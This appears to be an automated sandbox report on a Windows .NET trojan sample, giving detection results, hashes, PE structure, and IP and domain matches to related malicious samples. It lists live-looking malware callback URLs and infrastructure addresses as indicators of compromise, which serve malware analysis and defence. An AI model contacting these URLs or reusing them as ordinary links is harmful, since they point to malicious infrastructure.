                                                    Report type:light
                                                    Sample file name:20210113432.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:30
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@6/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 45.6% (good quality ratio 42.4%)
                                                    • Quality average: 73.9%
                                                    • Quality standard deviation: 30%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 13.88.21.125, 23.210.248.85, 51.104.139.180, 92.122.213.194, 92.122.213.247, 51.103.5.159, 52.155.217.156, 20.54.26.129, 51.11.168.160
                                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, par02p.wns.notify.windows.com.akadns.net, skypedataprdcoleus17.cloudapp.net, emea1.notify.windows.com.akadns.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    21:26:25API Interceptor1x Sleep call for process: 20210113432.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    34.102.136.180Inv.exeGet hashmaliciousBrowse
                                                    • www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP
                                                    74852.exeGet hashmaliciousBrowse
                                                    • www.wingateofhouston.com/nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA
                                                    orden pdf.exeGet hashmaliciousBrowse
                                                    • www.unbelievabowboutique.com/n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR
                                                    J0OmHIagw8.exeGet hashmaliciousBrowse
                                                    • www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT
                                                    zHgm9k7WYU.exeGet hashmaliciousBrowse
                                                    • www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl
                                                    JAAkR51fQY.exeGet hashmaliciousBrowse
                                                    • www.epicmassiveconcepts.com/csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf
                                                    65BV6gbGFl.exeGet hashmaliciousBrowse
                                                    • www.outlawgospelshow.com/kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl
                                                    YvGnm93rap.exeGet hashmaliciousBrowse
                                                    • www.crafteest.com/8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH
                                                    Order_00009.xlsxGet hashmaliciousBrowse
                                                    • www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
                                                    13-01-21.xlsxGet hashmaliciousBrowse
                                                    • www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
                                                    NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                    • www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                    • www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
                                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                                    • www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
                                                    PO#218740.exeGet hashmaliciousBrowse
                                                    • www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
                                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                                    • www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
                                                    20210113155320.exeGet hashmaliciousBrowse
                                                    • www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
                                                    13012021.exeGet hashmaliciousBrowse
                                                    • www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
                                                    Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                    • www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
                                                    FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                    • www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
                                                    6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                    • www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
                                                    184.168.131.241YvGnm93rap.exeGet hashmaliciousBrowse
                                                    • www.100feetpics.com/8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/
                                                    13-01-21.xlsxGet hashmaliciousBrowse
                                                    • www.magnabeautystyle.com/bw82/?Ab=gXuD_lh8bfV4RN&x2J8=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w==
                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                    • www.giftasmile2day.com/8rg4/?RJ=sR6mXmiXS1IkonJdYlFao53tdftaP6KCaP+fBLIZC0+jJmH2nVBesg00yLwM+Xg8gzFUXA==&LFQHH=_pgx3Rd
                                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                                    • www.4levelsplit.com/ehxh/?Gzux=c289Pf6jc9IJFpps8r8+Lt6Ee8L/cAoi2+SVR2//PPzDwX69iWpplSdxH7wF9BnLRy+d9xVwbw==&AnB=O0DToLD8K
                                                    5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                    • www.flowtechblasting.com/de92/?FdC4E2D=QiejqfYC3BbCJNEn1L9YjAZYeQrS2XJRpyp8bX9NepavoiL6J7ELahMOc3hsQ3/kkhCwn/Xq4Q==&AjR=9r4L1
                                                    cGLVytu1ps.exeGet hashmaliciousBrowse
                                                    • www.5037adairway.com/oean/?-Z_PiP=UDbslJB3352Ujtn3tZMgD4X+MNMiKzOXjq0rva/1O4ud4lUMxrfcjP9b1bYRdirsbQ2j&DxoHn=2dmDC
                                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                    • www.parkdaleliving.com/c8so/?Wx=cEUYti5cL+AXNxPbfx60LfZoJb25X1Xzf5mF7VOL6mQ/zZpS24NGTSz6B57b/JCXmby5&vB=lhr0E
                                                    Revise Order.exeGet hashmaliciousBrowse
                                                    • www.911strongerlife.com/ehxh/?Lh0l=ZTdpL2D0k&nVjxUJ=fgJsOsw9GjPFudchyJeTMAsFMJtCJAlIeij/f5Y2X41QAWRUv88iO9VbqfIESPYowK0a
                                                    PO890299700006.xlsxGet hashmaliciousBrowse
                                                    • www.giftasmile2day.com/8rg4/?SBZ=epg8b&cF=sR6mXmiXS1IkonJdYlFao53tdftaP6KCaP+fBLIZC0+jJmH2nVBesg00yLwM+Xg8gzFUXA==
                                                    yaQjVEGNEb.exeGet hashmaliciousBrowse
                                                    • www.rings-factory.info/aky/?3fcl7=9Bzcz9rupcq/fcdBzedFpFcAVEgsX7GayOYAxaGeWnG31CHjMXCW3rmdEhtU11/sLBtv&9r4LE=B8xX4PgPJ2gdf
                                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                                    • www.jaboilfieldsolutions.net/h3qo/?sPj8=mh84WN0PyZRt&mvHpc=LVetrVhuGU1b20GIONOMtnUB7ssdksXR8zso31xURPnTpaCc1BrVkN0BrBBMccTg8Va+
                                                    Purchase Order -263.exeGet hashmaliciousBrowse
                                                    • www.debsdivacollection.com/n925/?jzuPNj=uZ2A9VRuw4xRFjlJ6lOfwdLrvJnOxdV4GTJ8Z9Km7vFwq7U4RujhNKdm3N6RniHbbXSx&8p=_jAPiL
                                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                                    • www.ubiquitus1.com/oean/?wxl=wStyVayoyLLD60eYMZA1JiVF4OZSWq/RyncHDMWht3dWvQRGxdSth2/uKnhk9458qWTl&Tj=YvFHu
                                                    5j6RsnL8zx.exeGet hashmaliciousBrowse
                                                    • www.hlaprotiens.com/8rg4/?Txlp=OYDJLuueaFXNtOwihDRdfsH5NtUxWUpjnhyJYIgTyqexCACRaAwflaXc/5fQtJDnHrwn&OHX=JRmh
                                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                    • www.certainwebsites.com/qef6/?D0G=k8IoJtzplTULe2HTUCBzUrtS3pcHP2zLbNi4187qI+9qIZFWYMCnkNZDIzV4mgcktKg0&Q2J=fjlpdDePPPndHZ
                                                    catalogo TAWI group.exeGet hashmaliciousBrowse
                                                    • www.shelter911.com/nu8e/?cjoT_=In-HJZLp1x18_R&Fzr4zJRP=NCtMtW7/C4Z6KerRMrymse0RDtMAdn1HWpNCrJlxXpgubmY8odnuAKpHbksFm8IBMoIOwnovng==
                                                    current productlist.exeGet hashmaliciousBrowse
                                                    • www.911strongerlife.com/ehxh/?kRcDUld=fgJsOsw9GjPFudchyJeTMAsFMJtCJAlIeij/f5Y2X41QAWRUv88iO9VbqcktRPkQ5pBM1fh2NQ==&lZ9D=p2JpVPJHKZml3dvp
                                                    SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                    • www.certainwebsites.com/qef6/?Jfy=k8IoJtzplTULe2HTUCBzUrtS3pcHP2zLbNi4187qI+9qIZFWYMCnkNZDIzV4mgcktKg0&PR0=wTyplPn8O4bl3
                                                    W08347.exeGet hashmaliciousBrowse
                                                    • www.n95brokers.com/0wdn/?J2JxbP=YBfx8aMiq0YVjhTTvUsE2oMfn5gspIkr7wHtSJMZlWYhiSjKK4uWf5yNmAWzI72Q9cGw&BXLtz=E0GDCV7XwLQ
                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                    • www.boulderaffiliates.com/heye/?Blr=LyC+lQ0Gs81NgbqNBWuAAWDqyDOAgIq1ql8UB3qWiyPpU8tp8ZJFLkaDkOy645uQL/0aXUCENA==&a0G=tZktkpT8iptto

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    www.fordexplorerproblems.com20210113155320.exeGet hashmaliciousBrowse
                                                    • 74.208.236.28

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    AS-26496-GO-DADDY-COM-LLCUSYvGnm93rap.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    13-01-21.xlsxGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Documento.docGet hashmaliciousBrowse
                                                    • 107.180.2.39
                                                    5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                    • 192.169.223.13
                                                    cGLVytu1ps.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Project review_Pdf.exeGet hashmaliciousBrowse
                                                    • 107.180.44.126
                                                    Revise Order.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Info.docGet hashmaliciousBrowse
                                                    • 107.180.2.39
                                                    mensaje.docGet hashmaliciousBrowse
                                                    • 107.180.2.39
                                                    PO890299700006.xlsxGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Consignment Details.exeGet hashmaliciousBrowse
                                                    • 166.62.10.185
                                                    yaQjVEGNEb.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Purchase Order -263.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    order no. 43453.exeGet hashmaliciousBrowse
                                                    • 198.71.232.3
                                                    btVnDhh5K7.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    5j6RsnL8zx.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    GOOGLEUSInv.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    74852.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    orden pdf.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    J0OmHIagw8.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    zHgm9k7WYU.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    JAAkR51fQY.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    65BV6gbGFl.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    YvGnm93rap.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                                    • 108.177.126.132
                                                    VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                                    • 8.8.8.8
                                                    cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                                    • 216.239.38.21
                                                    Order_00009.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    13-01-21.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                                    • 108.177.127.132
                                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    rB26M8hfIh.exeGet hashmaliciousBrowse
                                                    • 8.8.8.8
                                                    brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                    • 216.239.34.21
                                                    WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                    • 108.177.126.132
                                                    ONEANDONE-ASBrauerstrasse48DE20210111 Virginie.exeGet hashmaliciousBrowse
                                                    • 217.160.0.162
                                                    20210113155320.exeGet hashmaliciousBrowse
                                                    • 74.208.236.28
                                                    FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                    • 217.160.0.193
                                                    6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                    • 217.160.0.193
                                                    cGLVytu1ps.exeGet hashmaliciousBrowse
                                                    • 74.208.236.196
                                                    invoice.xlsxGet hashmaliciousBrowse
                                                    • 217.160.0.251
                                                    Zahlungsauftrag.tarGet hashmaliciousBrowse
                                                    • 212.227.15.142
                                                    JUST1F1.tarGet hashmaliciousBrowse
                                                    • 212.227.15.142
                                                    Fizetesi felszolitas.exeGet hashmaliciousBrowse
                                                    • 212.227.15.158
                                                    Fizetesi felszolitas.tarGet hashmaliciousBrowse
                                                    • 212.227.15.142
                                                    Orden de pago BBVA.exeGet hashmaliciousBrowse
                                                    • 212.227.15.142
                                                    details.htmlGet hashmaliciousBrowse
                                                    • 195.20.250.196
                                                    Scan_23748991000.exeGet hashmaliciousBrowse
                                                    • 74.208.5.15
                                                    rtgs_pdf.exeGet hashmaliciousBrowse
                                                    • 217.160.0.163
                                                    details.htmlGet hashmaliciousBrowse
                                                    • 195.20.250.196
                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                    • 217.160.0.168
                                                    https://veringer.com/wp-includes/wwii11/GXQb6HLGz4AV965RfN9795cyETWfmdzBUarzFg4YkqaJnfdTD/Get hashmaliciousBrowse
                                                    • 217.76.132.244
                                                    r8a97.exeGet hashmaliciousBrowse
                                                    • 82.165.152.127
                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                    • 217.160.0.168
                                                    KI2011-2982..exeGet hashmaliciousBrowse
                                                    • 74.208.5.15

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20210113432.exe.log
                                                    Process:C:\Users\user\Desktop\20210113432.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1314
                                                    Entropy (8bit):5.350128552078965
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.020722508001574
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:20210113432.exe
                                                    File size:1070592
                                                    MD5:13dbc9c1c5a2811ecbee5f420c9c75b6
                                                    SHA1:6b01e540d3757944b61baa187159a908e170d5ae
                                                    SHA256:ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
                                                    SHA512:ae1414b91ba91a29575901ac0daf55aa937454b1afcd53d7d0c9461ca2b48d65bb1f3213ad23853987a40381a2f57be359fdbf7848ff57432b5e95ffd4cbcea1
                                                    SSDEEP:12288:snFhpCARzgXcLcSQgjKyetszECz09YadnGPqZYigRWuyuc28RhXb:s1LzgXcg+jKnkECuHnAqq/RWuy68Rd
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..J...........h... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x506886
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FFE978E [Wed Jan 13 06:47:42 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1068340x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1080000x60c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x10488c0x104a00False0.560206834532data7.02780570419IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1080000x60c0x800False0.3369140625data3.46177220497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x10a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x1080900x37adata
                                                    RT_MANIFEST0x10841c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2015
                                                    Assembly Version5.77.0.0
                                                    InternalNamePackingSize.exe
